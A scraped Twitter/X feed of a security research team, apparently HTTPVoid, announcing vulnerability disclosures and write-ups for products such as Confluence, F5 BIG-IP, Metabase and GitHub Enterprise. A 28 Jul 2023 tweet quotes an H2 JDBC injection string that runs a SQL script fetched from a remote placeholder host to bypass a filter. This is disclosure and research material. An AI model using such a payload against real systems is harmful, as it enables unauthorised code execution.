Managed by @rootxharsh @iamnoooob
Joined November 2021
- Tweets 51
- Following 73
- Followers 4,259
- Likes 36
14 Photos and videos
HTTPVoid retweeted
Feb 7
šØ CVE-2026-1731 šØ
Our team discovered a critical pre-auth RCE affecting BeyondTrust Remote Support & Privileged Remote Access.
SaaS/Cloud instances have been patched. If you're running self-hosted deployments, apply the patches immediately. More info in the comments.
3
64
245
35,707
HTTPVoid retweeted
5 Jun 2025
My research on CVE-2025-49113 is out. fearsoff.org/research/roundcā¦. Happy reading! #CVE #roundcube #poc @FearsOff
7
96
334
32,800
5 Jun 2025
CVE-2025-49113 is a fascinating PHP Object injection in Roundcube webmail, a really nice find by the original finder. #roundcube #cve-2025-49113 #rce
1
14
61
5,198
20 Mar 2025
New from us! Testing a Rails Nginx app? This should be in your checklist. Read the blog to know how we disclosed Discourse database backups!
20 Mar 2025
New Blogpost - We identified a vulnerability in Discourse where a misconfiguration in Rails send_file Nginx's internal directive can expose database backups!
projectdiscovery.io/blog/disā¦
This issue isn't limited to Discourse. It can affect other Rails Nginx apps with similar configurations.
Read our full analysis and detect it with our Nuclei template, now live on ProjectDiscovery Cloud!
1
13
1,612
HTTPVoid retweeted
25 Nov 2024
I just published a new blog post sharing an improved Deserialization Gadget Chain for Ruby!
It builds on the work of others, including Leonardo Giovanni, Peter Stƶckli @GHSecurityLab and @wcbowling
nastystereo.com/security/rubā¦
2
61
203
25,938
12 Nov 2024
Check out our latest blog post! We dive into GitHub Enterpriseās SAML implementation and explore an authentication bypass in encrypted assertion mode.
CVE-2024-4985 / CVE-2024-9487: GitHub Enterprise SAML Authentication Bypass.
projectdiscovery.io/blog/gitā¦
49
180
16,874
5 Oct 2024
Checkout our new blogpost! In this post we talk about SAML and the recent Ruby-SAML Auth bypass.
CVE-2024-45409: Ruby-SAML Auth Bypass in GitLab
blog.projectdiscovery.io/rubā¦
3
151
551
39,997
HTTPVoid retweeted
9 May 2024
My colleague @hash_kitten and I discovered a full-read SSRF vulnerability in Next.js (CVE-2024-34351). We published our research today on @assetnote's blog: assetnote.io/resources/reseaā¦. Thank you to the Vercel team for a smooth disclosure process.
16
181
780
95,518
HTTPVoid retweeted
6 May 2024
Check out my write-up on a seemingly harmless and limited send() in GitHub (CVE-2024-0200) and how it could be used to obtain environment variables from a production container and to achieve remote code execution in GitHub Enterprise Server:
starlabs.sg/blog/2024/04-senā¦
5
84
241
40,117
9 May 2024
Enjoy our next blog post this time an SQL Injection on Appleās Infra. Another win nets us a $25,000 bounty! š»š° #AppleSecurity #Research #bugbountytips #bugbounty
blog.projectdiscovery.io/hacā¦
8 May 2024
Check out our latest research blog, including detailed overview of how we discovered an SQL injection vulnerability ( nuclei template) in Masa/Mura CMS and Hacked into Apple's Infrastructure.
blog.projectdiscovery.io/hacā¦
#AppleSecurity #Research #CyberSecuirty #BugBounty
35
184
16,756
15 Feb 2024
Check out our new blog post! We hacked into Apple Travel Portal (yes, again!) using a 0-day Remote Code Execution exploit. Part 1 is live now, stay tuned for the follow-up on another RCE worth a total bounty of $40k!
blog.projectdiscovery.io/helā¦
4
110
353
44,486
22 Jan 2024
As the PoC is almost out, we are now publishing our analysis.
22 Jan 2024
š Just released our in-depth analysis of CVE-2023-22527, a critical RCE vulnerability in Atlassian Confluence Data Center & Server. š”ļø Don't miss out on our findings and learn how to detect and protect your systems! š blog.projectdiscovery.io/atlā¦
#cybersecurity #CVE #RCE #Atlassian #Confluence
1
19
3,262
18 Jan 2024
Hello OgnlGuard/isSafeExpression, we meet again š¤ š„² Confluence OGNL Injection.
1
6
60
9,943
29 Oct 2023
Reproduced the CVE-2023-46747 F5 Big-IP RCE via AJP smuggling. Props to @praetorianlabs for identifying this cool bug. @pdnuclei template dropping soon. Time to sleepš“ #f5-rce #CVE-2023-46747
27 Oct 2023
Reproduced the AJP request Smuggling to access /tmui/* resources directly. Very interesting bug indeed, need to further look into post-exploitation. Until next timeš“
1
37
164
27,875
27 Oct 2023
Reproduced the AJP request Smuggling to access /tmui/* resources directly. Very interesting bug indeed, need to further look into post-exploitation. Until next timeš“
26 Oct 2023
F5 BIGIP is vulnerable to a smuggling request vulnerability that an attacker can exploit to achieve unauthorized RCE. Our vulnerability research team responsibly disclose this to F5, which released a hotfix today. hubs.ly/Q026ThPw0 #vulnerabilityresearch #f5 #cve
10
78
39,488
HTTPVoid retweeted
9 Sep 2023
HTTP Request Splitting vulnerabilities exploitation
offzone.moscow/upload/iblockā¦
8
210
723
79,848
HTTPVoid retweeted
1 Sep 2023
Here is the #exploit that targets the "VMWare Aria Operations for Networks" which has CVSS 9.8 and targets all the versions from 6.0 to 6.10 (CVE-2023-34039) š„
I just wrote the exploit, but the discovery credit is for @rootxharsh and @iamnoooob š
github.com/sinsinology/CVE-2ā¦
36
78
14,154
28 Jul 2023
Plenty of ways to RCE, another way to bypass the INIT key block for the h2 engine is using an escape character:
mem:;\INIT=RUNSCRIPT FROM 'htttp://rce/poc.sql'//\;
Great find!
28 Jul 2023
The security research team at @assetnote found and reported a critical pre-auth RCE vulnerability to Metabase earlier this month CVE-2023-38646:
blog.assetnote.io/2023/07/22ā¦
This one was an incredibly fun discovery as there are many roads to RCE through JDBC. We've published details of the original discovery at our blog:
2
8
64
11,631
26 Jul 2023
The Metabase pre-auth RCE is interesting. While the entry point is straightforward, the process of exploitation is fun. We suspect we might have exploited this in an unintended way. We'll wait for @assetnote's blog, based on that we may or may not publish our analysis.
1
3
80
11,577
19 Jul 2023
ā Multiple RCEs, CVEs, and Confusions. Discover the roller coaster ride of vulnerabilities, patch bypasses, and uncover the story behind the temporary take down of our blog! Read now - nux.gg/adobe-coldfusion-rce-ā¦
#AdobeColdFusion #CVE-2023-29300 #CVE-2023-38203 #CVE-2023-38204
10
44
6,060